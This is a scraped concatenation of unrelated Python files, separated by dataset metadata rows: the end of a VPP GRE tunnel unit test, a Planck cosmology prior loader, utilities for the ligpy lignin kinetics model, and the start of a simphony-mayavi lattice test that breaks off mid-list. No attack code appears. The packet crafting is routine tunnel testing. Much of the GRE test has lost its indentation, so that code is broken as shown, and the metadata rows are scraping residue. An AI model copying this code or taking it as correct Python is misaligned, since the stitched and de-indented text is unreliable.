                       src=RandMAC('*:*:*:*:*:*')) /
                 IP(src=str(RandIP()), dst=str(RandIP())) /
                 UDP(sport=1234, dport=1234) /
                 Raw(payload))
            info.data = p.copy()
            pkts.append(p)
        return pkts

    def create_tunnel_stream_vlano4(self, src_if,
                                    tunnel_src, tunnel_dst, vlan):
        pkts = []
        for i in range(0, 257):
            info = self.create_packet_info(src_if.sw_if_index,
                                           src_if.sw_if_index)
            payload = self.info_to_payload(info)
            p = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
                 IP(src=tunnel_src, dst=tunnel_dst) /
                 GRE() /
                 Ether(dst=RandMAC('*:*:*:*:*:*'),
                       src=RandMAC('*:*:*:*:*:*')) /
                 Dot1Q(vlan=vlan) /
                 IP(src=str(RandIP()), dst=str(RandIP())) /
                 UDP(sport=1234, dport=1234) /
                 Raw(payload))
            info.data = p.copy()
            pkts.append(p)
        return pkts

    def verify_tunneled_4o4(self, src_if, capture, sent,
                            tunnel_src, tunnel_dst):
        self.assertEqual(len(capture), len(sent))

        for i in range(len(capture)):
            try:
                tx = sent[i]
                rx = capture[i]

                tx_ip = tx[IP]
                rx_ip = rx[IP]

                self.assertEqual(rx_ip.src, tunnel_src)
                self.assertEqual(rx_ip.dst, tunnel_dst)

                rx_gre = rx[GRE]
                rx_ip = rx_gre[IP]

                self.assertEqual(rx_ip.src, tx_ip.src)
                self.assertEqual(rx_ip.dst, tx_ip.dst)
                # IP processing post pop has decremented the TTL
                self.assertEqual(rx_ip.ttl + 1, tx_ip.ttl)

            except:
                self.logger.error(ppp("Rx:", rx))
                self.logger.error(ppp("Tx:", tx))
                raise

    def verify_tunneled_l2o4(self, src_if, capture, sent,
                             tunnel_src, tunnel_dst):
        self.assertEqual(len(capture), len(sent))

        for i in range(len(capture)):
            try:
                tx = sent[i]
                rx = capture[i]

                tx_ip = tx[IP]
                rx_ip = rx[IP]

                self.assertEqual(rx_ip.src, tunnel_src)
                self.assertEqual(rx_ip.dst, tunnel_dst)

                rx_gre = rx[GRE]
                rx_l2 = rx_gre[Ether]
                rx_ip = rx_l2[IP]
                tx_gre = tx[GRE]
                tx_l2 = tx_gre[Ether]
                tx_ip = tx_l2[IP]

                self.assertEqual(rx_ip.src, tx_ip.src)
                self.assertEqual(rx_ip.dst, tx_ip.dst)
                # bridged, not L3 forwarded, so no TTL decrement
                self.assertEqual(rx_ip.ttl, tx_ip.ttl)

            except:
                self.logger.error(ppp("Rx:", rx))
                self.logger.error(ppp("Tx:", tx))
                raise

    def verify_tunneled_vlano4(self, src_if, capture, sent,
                               tunnel_src, tunnel_dst, vlan):
        try:
            self.assertEqual(len(capture), len(sent))
        except:
            ppc("Unexpected packets captured:", capture)
raise
for i in range(len(capture)):
try:
tx = sent[i]
rx = capture[i]
tx_ip = tx[IP]
rx_ip = rx[IP]
self.assertEqual(rx_ip.src, tunnel_src)
self.assertEqual(rx_ip.dst, tunnel_dst)
rx_gre = rx[GRE]
rx_l2 = rx_gre[Ether]
rx_vlan = rx_l2[Dot1Q]
rx_ip = rx_l2[IP]
self.assertEqual(rx_vlan.vlan, vlan)
tx_gre = tx[GRE]
tx_l2 = tx_gre[Ether]
tx_ip = tx_l2[IP]
self.assertEqual(rx_ip.src, tx_ip.src)
self.assertEqual(rx_ip.dst, tx_ip.dst)
# bridged, not L3 forwarded, so no TTL decrement
self.assertEqual(rx_ip.ttl, tx_ip.ttl)
except:
self.logger.error(ppp("Rx:", rx))
self.logger.error(ppp("Tx:", tx))
raise
def verify_decapped_4o4(self, src_if, capture, sent):
self.assertEqual(len(capture), len(sent))
for i in range(len(capture)):
try:
tx = sent[i]
rx = capture[i]
tx_ip = tx[IP]
rx_ip = rx[IP]
tx_gre = tx[GRE]
tx_ip = tx_gre[IP]
self.assertEqual(rx_ip.src, tx_ip.src)
self.assertEqual(rx_ip.dst, tx_ip.dst)
# IP processing post pop has decremented the TTL
self.assertEqual(rx_ip.ttl + 1, tx_ip.ttl)
except:
self.logger.error(ppp("Rx:", rx))
self.logger.error(ppp("Tx:", tx))
raise
def verify_decapped_6o4(self, src_if, capture, sent):
self.assertEqual(len(capture), len(sent))
for i in range(len(capture)):
try:
tx = sent[i]
rx = capture[i]
tx_ip = tx[IP]
rx_ip = rx[IPv6]
tx_gre = tx[GRE]
tx_ip = tx_gre[IPv6]
self.assertEqual(rx_ip.src, tx_ip.src)
self.assertEqual(rx_ip.dst, tx_ip.dst)
self.assertEqual(rx_ip.hlim + 1, tx_ip.hlim)
except:
self.logger.error(ppp("Rx:", rx))
self.logger.error(ppp("Tx:", tx))
raise
def test_gre(self):
""" GRE tunnel Tests """
#
# Create an L3 GRE tunnel.
# - set it admin up
        # - assign an IP Address
# - Add a route via the tunnel
#
gre_if = VppGreInterface(self,
self.pg0.local_ip4,
"1.1.1.2")
gre_if.add_vpp_config()
#
# The double create (create the same tunnel twice) should fail,
# and we should still be able to use the original
#
try:
gre_if.add_vpp_config()
except Exception:
pass
else:
self.fail("Double GRE tunnel add does not fail")
gre_if.admin_up()
gre_if.config_ip4()
route_via_tun = IpRoute(self, "4.4.4.4", 32,
[RoutePath("0.0.0.0", gre_if.sw_if_index)])
route_via_tun.add_vpp_config()
#
# Send a packet stream that is routed into the tunnel
        # - they are all dropped since the tunnel's destination IP
        #   is unresolved - or resolves via the default route -
        #   which is a drop.
#
tx = self.create_stream_ip4(self.pg0, "5.5.5.5", "4.4.4.4")
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.assert_nothing_captured(
remark="GRE packets forwarded without DIP resolved")
#
# Add a route that resolves the tunnel's destination
#
route_tun_dst = IpRoute(self, "1.1.1.2", 32,
[RoutePath(self.pg0.remote_ip4,
self.pg0.sw_if_index)])
route_tun_dst.add_vpp_config()
#
# Send a packet stream that is routed into the tunnel
# - packets are GRE encapped
#
self.vapi.cli("clear trace")
tx = self.create_stream_ip4(self.pg0, "5.5.5.5", "4.4.4.4")
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture()
self.verify_tunneled_4o4(self.pg0, rx, tx,
self.pg0.local_ip4, "1.1.1.2")
#
# Send tunneled packets that match the created tunnel and
# are decapped and forwarded
#
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_4o4(self.pg0,
"1.1.1.2",
self.pg0.local_ip4,
self.pg0.local_ip4,
self.pg0.remote_ip4)
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture()
self.verify_decapped_4o4(self.pg0, rx, tx)
#
# Send tunneled packets that do not match the tunnel's src
#
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_4o4(self.pg0,
"1.1.1.3",
self.pg0.local_ip4,
self.pg0.local_ip4,
self.pg0.remote_ip4)
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.assert_nothing_captured(
remark="GRE packets forwarded despite no SRC address match")
#
# Configure IPv6 on the PG interface so we can route IPv6
# packets
#
self.pg0.config_ip6()
self.pg0.resolve_ndp()
#
        # Send IPv6 tunnel encapsulated packets
# - dropped since IPv6 is not enabled on the tunnel
#
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_6o4(self.pg0,
"1.1.1.2",
self.pg0.local_ip4,
self.pg0.local_ip6,
self.pg0.remote_ip6)
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.assert_nothing_captured(remark="IPv6 GRE packets forwarded "
"despite IPv6 not enabled on tunnel")
#
# Enable IPv6 on the tunnel
#
gre_if.config_ip6()
#
        # Send IPv6 tunnel encapsulated packets
# - forwarded since IPv6 is enabled on the tunnel
#
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_6o4(self.pg0,
"1.1.1.2",
self.pg0.local_ip4,
self.pg0.local_ip6,
self.pg0.remote_ip6)
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture()
self.verify_decapped_6o4(self.pg0, rx, tx)
#
# test case cleanup
#
route_tun_dst.remove_vpp_config()
route_via_tun.remove_vpp_config()
gre_if.remove_vpp_config()
self.pg0.unconfig_ip6()
def test_gre_vrf(self):
""" GRE tunnel VRF Tests """
#
# Create an L3 GRE tunnel whose destination is in the non-default
# table. The underlay is thus non-default - the overlay is still
# the default.
# - set it admin up
        # - assign an IP Address
#
gre_if = VppGreInterface(self, self.pg1.local_ip4,
"2.2.2.2",
outer_fib_id=1)
gre_if.add_vpp_config()
gre_if.admin_up()
gre_if.config_ip4()
#
# Add a route via the tunnel - in the overlay
#
route_via_tun = IpRoute(self, "9.9.9.9", 32,
[RoutePath("0.0.0.0", gre_if.sw_if_index)])
route_via_tun.add_vpp_config()
#
# Add a route that resolves the tunnel's destination - in the
# underlay table
#
route_tun_dst = IpRoute(self, "2.2.2.2", 32, table_id=1,
paths=[RoutePath(self.pg1.remote_ip4,
self.pg1.sw_if_index)])
route_tun_dst.add_vpp_config()
#
# Send a packet stream that is routed into the tunnel
# packets are sent in on pg0 which is in the default table
# - packets are GRE encapped
#
self.vapi.cli("clear trace")
tx = self.create_stream_ip4(self.pg0, "5.5.5.5", "9.9.9.9")
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg1.get_capture()
self.verify_tunneled_4o4(self.pg1, rx, tx,
self.pg1.local_ip4, "2.2.2.2")
#
# Send tunneled packets that match the created tunnel and
        # are decapped and forwarded. This tests that the decap lookup
        # does not happen in the encap table
#
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_4o4(self.pg1,
"2.2.2.2",
self.pg1.local_ip4,
self.pg0.local_ip4,
self.pg0.remote_ip4)
self.pg1.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture()
self.verify_decapped_4o4(self.pg0, rx, tx)
#
# test case cleanup
#
route_tun_dst.remove_vpp_config()
route_via_tun.remove_vpp_config()
gre_if.remove_vpp_config()
def test_gre_l2(self):
""" GRE tunnel L2 Tests """
#
# Add routes to resolve the tunnel destinations
#
route_tun1_dst = IpRoute(self, "2.2.2.2", 32,
[RoutePath(self.pg0.remote_ip4,
self.pg0.sw_if_index)])
route_tun2_dst = IpRoute(self, "2.2.2.3", 32,
[RoutePath(self.pg0.remote_ip4,
self.pg0.sw_if_index)])
route_tun1_dst.add_vpp_config()
route_tun2_dst.add_vpp_config()
#
# Create 2 L2 GRE tunnels and x-connect them
#
gre_if1 = VppGreInterface(self, self.pg0.local_ip4,
"2.2.2.2",
is_teb=1)
gre_if2 = VppGreInterface(self, self.pg0.local_ip4,
"2.2.2.3",
is_teb=1)
gre_if1.add_vpp_config()
gre_if2.add_vpp_config()
gre_if1.admin_up()
gre_if2.admin_up()
self.vapi.sw_interface_set_l2_xconnect(gre_if1.sw_if_index,
gre_if2.sw_if_index,
enable=1)
self.vapi.sw_interface_set_l2_xconnect(gre_if2.sw_if_index,
gre_if1.sw_if_index,
enable=1)
#
# Send in tunnel encapped L2. expect out tunnel encapped L2
# in both directions
#
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_l2o4(self.pg0,
"2.2.2.2",
self.pg0.local_ip4)
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture()
self.verify_tunneled_l2o4(self.pg0, rx, tx,
self.pg0.local_ip4,
"2.2.2.3")
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_l2o4(self.pg0,
"2.2.2.3",
self.pg0.local_ip4)
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture()
self.verify_tunneled_l2o4(self.pg0, rx, tx,
self.pg0.local_ip4,
"2.2.2.2")
self.vapi.sw_interface_set_l2_xconnect(gre_if1.sw_if_index,
gre_if2.sw_if_index,
enable=0)
self.vapi.sw_interface_set_l2_xconnect(gre_if2.sw_if_index,
gre_if1.sw_if_index,
enable=0)
#
# Create a VLAN sub-interfaces on the GRE TEB interfaces
# then x-connect them
#
gre_if_11 = VppDot1QSubint(self, gre_if1, 11)
gre_if_12 = VppDot1QSubint(self, gre_if2, 12)
# gre_if_11.add_vpp_config()
# gre_if_12.add_vpp_config()
gre_if_11.admin_up()
gre_if_12.admin_up()
self.vapi.sw_interface_set_l2_xconnect(gre_if_11.sw_if_index,
gre_if_12.sw_if_index,
enable=1)
self.vapi.sw_interface_set_l2_xconnect(gre_if_12.sw_if_index,
gre_if_11.sw_if_index,
enable=1)
#
        # Configure both to pop their respective VLAN tags,
        # so that during the x-connect they will subsequently push
#
self.vapi.sw_interface_set_l2_tag_rewrite(gre_if_12.sw_if_index,
L2_VTR_OP.L2_POP_1,
12)
self.vapi.sw_interface_set_l2_tag_rewrite(gre_if_11.sw_if_index,
L2_VTR_OP.L2_POP_1,
11)
#
        # Send traffic in both directions - expect the VLAN tags to
# be swapped.
#
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_vlano4(self.pg0,
"2.2.2.2",
self.pg0.local_ip4,
11)
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture()
self.verify_tunneled_vlano4(self.pg0, rx, tx,
self.pg0.local_ip4,
"2.2.2.3",
12)
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_vlano4(self.pg0,
"2.2.2.3",
self.pg0.local_ip4,
12)
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture()
self.verify_tunneled_vlano4(self.pg0, rx, tx,
self.pg0.local_ip4,
"2.2.2.2",
11)
#
# Cleanup Test resources
#
gre_if_11.remove_vpp_config()
gre_if_12.remove_vpp_config()
gre_if1.remove_vpp_config()
gre_if2.remove_vpp_config()
        route_tun1_dst.remove_vpp_config()
        route_tun2_dst.remove_vpp_config()
if __name__ == '__main__':
unittest.main(testRunner=VppTestRunner)
|
apache-2.0
| 656,361,454,378,659,000
| 33.666667
| 78
| 0.455915
| false
| 3.634321
| true
| false
| false
|
dessn/sn-bhm
|
dessn/planck/planck.py
|
1
|
1173
|
import numpy as np
import inspect
import os
def get_planck(restricted=True):
""" Priors from COM_CosmoParams_fullGrid_R2.00\base_w\plikHM_TT_lowTEB\base_w_plikHM_TT_lowTEB"""
file = os.path.abspath(inspect.stack()[0][1])
dir_name = os.path.dirname(file)
results = np.load(dir_name + "/planck.npy")
weights = results[:, 0]
likelihood = results[:, 1]
chain = results[:, 2:]
param_file = dir_name + "/planck.paramnames"
with open(param_file) as f:
params = ["$%s$" % l.split("\t")[1][:-1] for l in f]
if restricted:
wanted_params = [r"$\Omega_m$", "$w$"]
chain = chain[:, [params.index(p) for p in wanted_params]]
params = wanted_params
return chain, params, weights, likelihood
if __name__ == "__main__":
chain, params, weights, likelihood = get_planck()
om = chain[:, params.index(r"$\Omega_m$")]
w = chain[:, params.index(r"$w$")]
from chainconsumer import ChainConsumer
c = ChainConsumer()
c.add_chain(chain, parameters=params)
c.plotter.plot(display=True)
# import matplotlib.pyplot as plt
# plt.hist2d(om, w, bins=100, weights=weights)
# plt.show()
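    # A minimal sketch of weighted posterior means (np.average accepts the
    # non-uniform chain weights returned by get_planck()):
    # om_mean = np.average(om, weights=weights)
    # w_mean = np.average(w, weights=weights)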
|
mit
| -8,789,032,739,981,367,000
| 32.514286
| 101
| 0.618926
| false
| 3.119681
| false
| false
| false
|
houghb/ligpy
|
ligpy/ligpy_utils.py
|
1
|
18322
|
"""
Misc utility functions required by several modules in the ligpy program.
"""
import os
import numpy as np
from constants import GAS_CONST, MW
def set_paths():
"""
Set the absolute path to required files on the current machine.
Returns
-------
reactionlist_path : str
path to the file `complete_reactionlist.dat`
rateconstantlist_path : str
path to the file `complete_rateconstantlist.dat`
compositionlist_path : str
path to the file `compositionlist.dat`
"""
module_dir = os.path.abspath(__file__).split('ligpy_utils')[0]
reactionlist_path = module_dir + 'data/complete_reaction_list.dat'
rateconstantlist_path = module_dir + 'data/complete_rateconstant_list.dat'
compositionlist_path = module_dir + 'data/compositionlist.dat'
return reactionlist_path, rateconstantlist_path, compositionlist_path
def get_specieslist(completereactionlist):
"""
Make a list of all the molecular species involved in the kinetic scheme.
Parameters
----------
completereactionlist : str
the path to the `complete_reaction_list.dat` file
Returns
-------
specieslist : list
a list of all the species in the kinetic scheme
"""
specieslist = []
for line in open(completereactionlist, 'r').readlines():
for spec in line.split(','):
# If the species has already been added to the list then move on.
if spec.split('_')[1].split()[0] in specieslist:
continue
else:
specieslist.append(spec.split('_')[1].split()[0])
specieslist.sort()
return specieslist
def get_speciesindices(specieslist):
"""
Create a dictionary to assign an arbitrary index to each of the species in
the kinetic scheme.
Parameters
----------
specieslist : list
a list of all the species in the model
Returns
-------
speciesindices : dict
a dictionary of arbitrary indices with the species
from specieslist as keys
indices_to_species : dict
the reverse of speciesindices (keys are the indices
and values are the species)
"""
speciesindices = {}
index = 0
for x in specieslist:
speciesindices[x] = index
index += 1
indices_to_species = dict(zip(speciesindices.values(),
speciesindices.keys()))
return speciesindices, indices_to_species
def define_initial_composition(compositionlist, species):
"""
Read the plant ID specified and define the initial composition of the
lignin polymer in terms of the three model components (PLIGC, PLIGH,
PLIGO).
Parameters
----------
compositionlist : str
the path of the `compositionlist.dat` file
species : str
the name of a lignin species that exists in the
`compositionlist.dat` file
Returns
-------
pligc_0 : float
The initial composition (mol/L) of PLIGC
pligh_0 : float
The initial composition (mol/L) of PLIGH
pligo_0 : float
The initial composition (mol/L) of PLIGO
"""
for line in open(compositionlist, 'rb').readlines():
if line.split(',')[0] == species:
# Initial compositions [mole fraction]
pligc_mol = float(line.split(',')[1])
pligh_mol = float(line.split(',')[2])
pligo_mol = float(line.split(',')[3])
# The weighted average molar mass of mixture [kg/mol]
weighted_m = (301*pligc_mol + 423*pligh_mol + 437*pligo_mol)/1000
# the density of the condensed phase [kg/L]
density = 0.75
# Initial compositions [mol/L]
pligc_0 = density/weighted_m * pligc_mol
pligh_0 = density/weighted_m * pligh_mol
pligo_0 = density/weighted_m * pligo_mol
break
return pligc_0, pligh_0, pligo_0
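# Worked example (hypothetical mole fractions, not taken from the composition file):
# with pligc_mol=0.3, pligh_mol=0.4, pligo_mol=0.3,
# weighted_m = (301*0.3 + 423*0.4 + 437*0.3)/1000 = 0.3906 kg/mol, so
# pligc_0 = 0.75/0.3906 * 0.3 ~= 0.576 mol/L (PLIGH and PLIGO follow the same pattern).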
def build_k_matrix(rateconsts):
"""
Build a matrix of all the rate constant parameters (A, n, E).
Parameters
----------
rateconsts : str
the path to the file `complete_rateconstant_list.dat`
Returns
-------
kmatrix : list
a list of lists that defines a matrix. Each entry in the list
is A, n, E for a given reaction
"""
num_lines = sum(1 for line in open(rateconsts))
kmatrix = [None]*num_lines
for i, line in enumerate(open(rateconsts, 'r').readlines()):
kmatrix[i] = [line.split(' ')[0], line.split(' ')[1],
line.split(' ')[2].split()[0]]
return kmatrix
def get_k_value(T, reaction_index, kmatrix):
"""
Returns the value of the rate constant for a particular reaction index.
Parameters
----------
T : float
temperature in Kelvin
reaction_index : int
the index of the reaction for which you want the rate
kmatrix : list
the kmatrix generated by build_k_matrix()
Returns
-------
k : float
the value of the rate constant for the given reaction at the given
temperature.
"""
k = (eval(kmatrix[reaction_index][0]) *
T**eval(kmatrix[reaction_index][1]) *
np.exp(-1 * eval(kmatrix[reaction_index][2]) /(GAS_CONST * T)))
return k
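# The expression above is the modified Arrhenius form k = A * T**n * exp(-E/(R*T)),
# where A, n and E are stored as strings in the rate-constant file (hence the eval
# calls) and R is GAS_CONST. For example, a hypothetical row with A='1e13', n='0',
# E='1e5' gives k = 1e13 * exp(-1e5/(GAS_CONST*T)).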
def get_k_value_list(T, kmatrix):
"""
Returns a list of all the k-values for a given temperature.
Parameters
----------
T : float
temperature in Kelvin
kmatrix : list
the kmatrix generated by build_k_matrix()
Returns
-------
kvaluelist : list
a list of all the rate constant values for a given temperature
"""
kvaluelist = []
for index, row in enumerate(kmatrix):
kvaluelist.append(get_k_value(T, index, kmatrix))
return kvaluelist
def build_reactant_dict(completereactionlist, speciesindices):
"""
Build a dictionary of the reactants involved in each reaction,
along with their stoichiometric coefficients. The keys of the
dictionary are the reaction numbers, the values are lists of lists
[[reactant1index, -1*coeff1],...]
Parameters
----------
completereactionlist : str
path to the file `complete_reaction_list.dat`
speciesindices : dict
the dictionary speciesindices from
get_speciesindices()
Returns
-------
reactant_dict : dict
a dictionary where keys are reaction numbers and values
are lists of lists with the reactants and their
stoichiometric coefficients for each reaction
"""
reactant_dict = {}
for rxnindex, reaction in enumerate(open(completereactionlist, 'rb')
.readlines()):
reactants = []
# x is each coefficient_species set
for x in reaction.split(','):
# if the species is a reactant
if float(x.split('_')[0]) < 0:
reactants.append([speciesindices[x.split('_')[1].split()[0]],
-1*float(x.split('_')[0])])
# in preceding line: *-1 because I want the |stoich coeff|
reactant_dict[rxnindex] = reactants
return reactant_dict
def build_species_rxns_dict(completereactionlist):
"""
Build a dictionary where keys are species and values are lists with the
reactions that species is involved in, that reaction's sign in the net
rate equation, and the stoichiometric coefficient of the species in that
reaction.
Parameters
----------
completereactionlist : str
path to the file `complete_reaction_list.dat`
Returns
-------
species_rxns : dict
keys are the species in the model; values are lists of
[reaction that species is involved in,
sign of that species in the net rate equation,
stoichiometric coefficient]
"""
specieslist = get_specieslist(set_paths()[0])
species_rxns = {}
for species in specieslist:
# This loop makes a list of which reactions "species" takes part in
# and what sign that term in the net rate eqn has
# and what the stoichiometric coefficient is
reactions_involved = []
for rxnindex, line in enumerate(open(completereactionlist, 'rb')
.readlines()):
# example of x = '-1_ADIO'
for x in line.split(','):
# If the species being iterated over is part of this reaction
if species == x.split('_')[1].split()[0]:
# if the species is a reactant
if float(x.split('_')[0]) < 0:
reactions_involved.append(
[rxnindex, -1, x.split('_')[0]])
# if the species is a product
if float(x.split('_')[0]) > 0:
reactions_involved.append(
[rxnindex, 1, '+' + x.split('_')[0]])
species_rxns[species] = reactions_involved
return species_rxns
def build_rates_list(rateconstlist, reactionlist, speciesindices,
indices_to_species, human='no'):
""" This function writes the list of rate expressions for each reaction.
Parameters
----------
rateconstlist : str
the path to the file `complete_rateconstant_list.dat`
reactionlist : str
the path to the file `complete_reaction_list.dat`
speciesindices : dict
a dictionary of arbitrary indices with the species
from specieslist as keys
indices_to_species : dict
the reverse of speciesindices (keys are the indices
and values are the species)
human : str, optional
indicate whether the output of this function should
be formatted for a human to read ('yes'). Default
is 'no'
Returns
-------
rates_list : list
a list of the rate expressions for all the reactions in the
model
"""
kmatrix = build_k_matrix(rateconstlist)
reactant_dict = build_reactant_dict(reactionlist, speciesindices)
rates_list = []
for i, line in enumerate(kmatrix):
rate = 'rate[%s] = kvalue(T,%s) ' % (i, i)
concentrations = ''
for entry in reactant_dict[i]:
if entry == 'n': # if there is no reaction
concentrations = '* 0'
break
else:
if human == 'no':
concentrations += '* y[%s]**%s ' % (entry[0], entry[1])
elif human == 'yes':
concentrations += '* [%s]**%s ' % \
(indices_to_species[entry[0]], entry[1])
else:
raise ValueError('human must be a string: yes or no')
rate += concentrations
rates_list.append(rate)
return rates_list
def build_dydt_list(rates_list, specieslist, species_rxns, human='no'):
"""This function returns the list of dydt expressions generated for all
the reactions from rates_list.
Parameters
----------
rates_list : list
the output of build_rates_list()
specieslist : list
a list of all the species in the kinetic scheme
species_rxns : dict
dictionary where keys that are the model species and
values are the reactions they are involved in
human : str, optional
indicate whether the output of this function should
be formatted for a human to read ('yes'). Default
is 'no'
Returns
-------
dydt_expressions : list
expressions for the ODEs expressing the concentration
of each species with time
"""
dydt_expressions = []
for species in specieslist:
rate_formation = 'd[%s]/dt = ' % (species)
# "entry" is [reaction#, sign of that reaction, coefficient]
for entry in species_rxns[species]:
if human == 'no':
rate_formation += '%s*%s ' % \
(entry[2], rates_list[entry[0]].split(' = ')[1])
elif human == 'yes':
rate_formation += '%s*rate[%s] ' % (entry[2], entry[0])
else:
raise ValueError('human must be a string: yes or no')
dydt_expressions.append(rate_formation)
return dydt_expressions
def write_rates_and_odes(filename, rates, odes):
"""
Writes a file that contains the model equations to be solved (a list of
rate expressions, followed by a list of ODEs for each species). This
file is just for reference for humans to be able to look at the specific
reactions that are modeled, it is not actually used by the program. Users
should only need to generate this file if they've changed anything about
the kinetic scheme (it already exists in the data folder).
Parameters
----------
filename : str
the filename (including relative path if appropriate) of the
ratesandodes file to write
rates : list
the output of build_rates_list() with human='yes'
odes : list
the output of build_dydt_list() with human='yes'
Returns
-------
None
"""
with open(filename, 'wb') as initialize:
initialize.write('Reaction Rates:\n')
with open(filename, 'ab') as writer:
for line in rates:
writer.write(line+'\n')
writer.write('\n\nODE''s:\n')
for line in odes:
writer.write(line+'\n')
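# Usage sketch chaining the helpers above (the output filename is illustrative):
#
#   rxn_path, rate_path, comp_path = set_paths()
#   slist = get_specieslist(rxn_path)
#   sindices, i_to_s = get_speciesindices(slist)
#   rates = build_rates_list(rate_path, rxn_path, sindices, i_to_s, human='yes')
#   odes = build_dydt_list(rates, slist, build_species_rxns_dict(rxn_path), human='yes')
#   write_rates_and_odes('ratesandodes.txt', rates, odes)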
# These are some functions for checking the integrity of some model
# components, but they are not used except for exploratory or verification
# purposes
def check_species_in_MW(specieslist=None):
"""
Check to make sure that everything in the specieslist is in the MW
dictionary from `constants.py`.
Parameters
----------
specieslist : list, optional
a list of species to check against. If no list is
specified then the function get_specieslist() will be used
to generate the default list
Returns
-------
None
"""
    if specieslist is None:
specieslist = get_specieslist(set_paths()[0])
for item in MW.keys():
if item in specieslist:
print '%s is in specieslist' % ('{: <20}'.format(item))
else:
print '********'+item
for item in specieslist:
if item in MW.keys():
print '%s is in MW dictionary' % ('{: <20}'.format(item))
else:
print '********'+item
print '\n%s should equal %s' % (len(MW.keys()), len(specieslist))
def check_mass_balance():
"""
Check for conservation of mass, and if mass is not conserved, see which
reactions are creating or losing mass.
Note that mass will not be wholly conserved in this model because
protons are not accounted for when radicals are involved in
non-Hydrogen-abstraction reactions, but all other reactions should
conserve mass.
Parameters
----------
None
Returns
-------
total_mass_balance : numpy array
an array with the amount of mass gained or lost
in each reaction
"""
specieslist = get_specieslist(set_paths()[0])
speciesindices = get_speciesindices(specieslist)[0]
kmatrix = build_k_matrix(set_paths()[1])
species_rxns = build_species_rxns_dict(set_paths()[0])
# Make vector of the MW's of each species, in the order from speciesindices
mw_vector = np.zeros((len(MW), 1))
for species in MW:
mw_vector[speciesindices[species]] = MW[species][0]
mw_vector = mw_vector.transpose()
# In this stoichiometric matrix, rows are species, columns are reactions
stoicmatrix = np.zeros((len(speciesindices), len(kmatrix)), dtype='float')
for species in species_rxns:
i = speciesindices[species]
for reaction in species_rxns[species]:
j = reaction[0]
stoicmatrix[i, j] += float(reaction[2])
# The result of this dot product should be a vector full of zeros.
# This will not be the case because protons are not accounted for when
# radicals are involved in non-H-abstraction rxns,
# but all other reactions should be 0
total_mass_balance = np.dot(mw_vector, stoicmatrix[:, :])
# Use this to look at which reactions are creating or losing mass
# (from missing Hydrogen)
h_sum = 0
for i, value in enumerate(total_mass_balance[0, :]):
if value != 0:
print i, value
h_sum += value
print '\nNet mass change = %s' % h_sum
return total_mass_balance
def check_species_fate():
"""
Check to see which species (if any) are only produced, but never
consumed in the model reactions (assuming that all reactions occur).
Parameters
----------
None
Returns
-------
fate_dict : dictionary
a dictionary with the fate of model species
"""
specieslist = get_specieslist(set_paths()[0])
species_rxns = build_species_rxns_dict(set_paths()[0])
fate_dict = {}
for species in specieslist:
fate_dict[species] = 'produced only'
for entry in species_rxns[species]:
if entry[1] < 0:
fate_dict[species] = 'consumed'
for species in specieslist:
if fate_dict[species] == 'consumed':
del fate_dict[species]
return fate_dict
|
bsd-2-clause
| -1,464,800,841,360,162,300
| 34.439072
| 79
| 0.569643
| false
| 4.337595
| false
| false
| false
|
simphony/simphony-mayavi
|
simphony_mayavi/cuds/tests/test_vtk_lattice.py
|
1
|
9617
|
import unittest
from functools import partial
from numpy.testing import assert_array_equal
from hypothesis import given
from hypothesis.strategies import sampled_from
from tvtk.api import tvtk
from simphony.core.cuba import CUBA
from simphony.testing.abc_check_lattice import (
CheckLatticeNodeOperations, CheckLatticeNodeCoordinates)
from simphony.testing.utils import compare_lattice_nodes
from simphony.core.data_container import DataContainer
from simphony.cuds.lattice import (
make_hexagonal_lattice, make_cubic_lattice, make_orthorhombic_lattice,
make_body_centered_cubic_lattice, make_face_centered_cubic_lattice,
make_rhombohedral_lattice, make_tetragonal_lattice,
make_body_centered_tetragonal_lattice,
make_face_centered_orthorhombic_lattice,
make_base_centered_orthorhombic_lattice,
make_body_centered_orthorhombic_lattice,
make_monoclinic_lattice,
make_base_centered_monoclinic_lattice,
make_triclinic_lattice,
Lattice, LatticeNode)
from simphony.cuds.primitive_cell import BravaisLattice, PrimitiveCell
from simphony_mayavi.cuds.api import VTKLattice
from simphony_mayavi.core.api import supported_cuba
lattice_types = sampled_from([
make_cubic_lattice('test', 0.1, (3, 6, 5)),
make_hexagonal_lattice('test', 0.1, 0.2, (5, 4, 6)),
make_orthorhombic_lattice('test', (0.1, 0.2, 0.3), (3, 7, 6)),
make_body_centered_cubic_lattice('test', 0.1, (3, 6, 5)),
make_face_centered_cubic_lattice('test', 0.1, (3, 6, 5)),
make_rhombohedral_lattice('test', 0.1, 0.2, (3, 6, 5)),
make_tetragonal_lattice('test', 0.1, 0.2, (3, 6, 5)),
make_body_centered_tetragonal_lattice('test', 0.1, 0.5, (3, 6, 5)),
make_face_centered_orthorhombic_lattice('test', (0.5, 0.6, 0.7),
